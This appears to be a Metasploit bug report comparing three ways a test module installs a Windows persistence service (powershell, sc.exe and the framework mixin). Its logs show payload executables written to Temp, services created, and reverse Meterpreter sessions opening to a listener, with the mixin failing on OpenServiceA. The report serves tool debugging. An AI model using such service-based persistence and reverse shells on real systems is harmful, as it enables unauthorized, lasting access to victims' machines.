While testing #20638 I noticed an inconsistency in permissions required (or possibly other bug) when using the service mixin vs powershell and sc.exe.
I wrote a test script to outline the issue: https://gist.github.com/h00die/e7b8e7c43eaf9c68bba35bc28adb2fa1
Test run against Windows 10 with meterp via webdelivery in an admin privileged powershell window.
Run as admin:
```
msf exploit(windows/persistence/service_tester) > [*] is_admin?: true
[*] is_system?: false
[*] ================================
[*] powershell method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\CdaNm.exe
[*] Creating service xCFNwXabNgF
[*] Installing service
[*] Install service:
Status Name DisplayName
------ ---- -----------
Stopped xCFNwXabNgF hgfnjSNp
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
[*] Meterpreter session 12 opened (2.2.2.2:4444 -> 1.1.1.1:50298) at 2025-10-22 19:49:09 -0400
[*] ================================
[*] sc.exe method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\JEfRC.exe
[*] Creating service eoKFDDGy
[*] Install service: [SC] CreateService SUCCESS
[*] Set Description: [SC] ChangeServiceConfig2 SUCCESS
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
SERVICE_NAME: eoKFDDGy
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 6668
FLAGS :
[*] Meterpreter session 13 opened (2.2.2.2:4444 -> 1.1.1.1:50299) at 2025-10-22 19:49:15 -0400
[*] ================================
[*] lib/mixin method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\XaPCPtyx.exe
[*] Creating service FbBAOBlzbgXi
[*] Install service: 6
[-] Exploit failed: RuntimeError Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
```
So we see that:

- Using powershell commands, we get a valid running service.
- Using sc.exe, we get a valid running service.
- Using the mixin, we get `6` as the return (it wasn't created), and when trying to run the non-existent server, we get an error message.
Run as system:
```
msf exploit(windows/persistence/service_tester) > sessions -i 11
[*] Starting interaction with 11...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 11...
msf exploit(windows/persistence/service_tester) > rexploit
[*] Reloading module...
[*] Exploit running as background job 6.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
msf exploit(windows/persistence/service_tester) > [*] is_admin?: true
[*] is_system?: true
[*] ================================
[*] powershell method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\uXDCbywa.exe
[*] Creating service MFrORYjIgdVX
[*] Installing service
[*] Install service:
Status Name DisplayName
------ ---- -----------
Stopped MFrORYjIgdVX zFwEhpI
[*] Start service:
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Meterpreter session 14 opened (2.2.2.2:4444 -> 1.1.1.1:50300) at 2025-10-22 19:52:20 -0400
[*] ================================
[*] sc.exe method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\dTdDW.exe
[*] Creating service IeLFnJiue
[*] Install service: [SC] CreateService SUCCESS
[*] Set Description: [SC] ChangeServiceConfig2 SUCCESS
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
SERVICE_NAME: IeLFnJiue
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 9932
FLAGS :
[*] Meterpreter session 15 opened (2.2.2.2:4444 -> 1.1.1.1:50301) at 2025-10-22 19:52:26 -0400
[*] ================================
[*] lib/mixin method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\EesEekmA.exe
[*] Creating service VONMCEdA
[*] Install service: 6
[-] Exploit failed: RuntimeError Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
```
Same results.
Test run against Windows 10 with meterp via psexec.
```
msf exploit(windows/persistence/service_tester) > [*] is_admin?: true
[*] is_system?: true
[*] ================================
[*] powershell method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\mLjvNPkF.exe
[*] Creating service lxsLfQlLH
[*] Installing service
[*] Install service:
Status Name DisplayName
------ ---- -----------
Stopped lxsLfQlLH ebrb
[*] Start service:
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Meterpreter session 17 opened (2.2.2.2:4444 -> 1.1.1.1:50304) at 2025-10-22 19:54:54 -0400
[*] ================================
[*] sc.exe method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\JxOszqjA.exe
[*] Creating service fUJNSAWF
[*] Install service: [SC] CreateService SUCCESS
[*] Set Description: [SC] ChangeServiceConfig2 SUCCESS
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
SERVICE_NAME: fUJNSAWF
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 9748
FLAGS :
[*] Meterpreter session 18 opened (2.2.2.2:4444 -> 1.1.1.1:50305) at 2025-10-22 19:55:00 -0400
[*] ================================
[*] lib/mixin method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\fbsXNX.exe
[*] Creating service sjPslLkqMhz
[*] Install service: 6
[-] Exploit failed: RuntimeError Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
```
# Other Notes
Don't rule out user error.